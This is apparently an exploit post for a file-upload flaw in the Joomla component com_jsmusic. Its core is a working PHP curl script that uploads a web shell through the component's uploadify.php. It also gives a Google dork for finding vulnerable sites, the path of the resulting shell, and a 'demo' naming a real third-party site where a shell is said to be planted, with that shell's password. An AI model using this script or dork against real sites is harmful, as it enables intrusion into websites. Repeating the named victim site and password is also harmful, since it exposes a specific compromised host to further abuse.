facebook facebook twitter rss

Joomla Component com_jsmusic shell upload Vulnerability

Author: Zikou-16 , Published: 01-12-2012

-------------------------------------------------------------------------------
Joomla Component com_jsmusic shell upload Vulnerability
--------------------------------------------------------------------------------

######################################################################################
#
# Author => Zikou-16
#
# Facebook => http://fb.me/Zikou.se
#
# Google Dork => inurl:"com_jsmusic"
#
#######################################################################################

Exploit : uploadshell.php
<?php

$uploadfile
="dz.php";

$ch curl_init("http://localhost/components/com_jsmusic/js/uploadify/uploadify.php?folder=/components/com_jsmusic/js/");
curl_setopt($chCURLOPT_POSTtrue);
curl_setopt($chCURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
curl_setopt($chCURLOPT_RETURNTRANSFER1);
$postResult curl_exec($ch);
curl_close($ch);
print 
"$postResult";

?>

Shell Access : http://localhost/components/com_jsmusic/js/dz.php

<?php
phpinfo
();
?>


#######################################################################################
#
# Demo : http://www.bsbmusical.com/professor/components/com_jsmusic/js/uploadify/uploadify.php
#
# Shell: http://www.bsbmusical.com/professor/components/com_jsmusic/js/x.php
# _____________________
# Shell password => dz0
# _____________________
#######################################################################################

Like us on Facebook :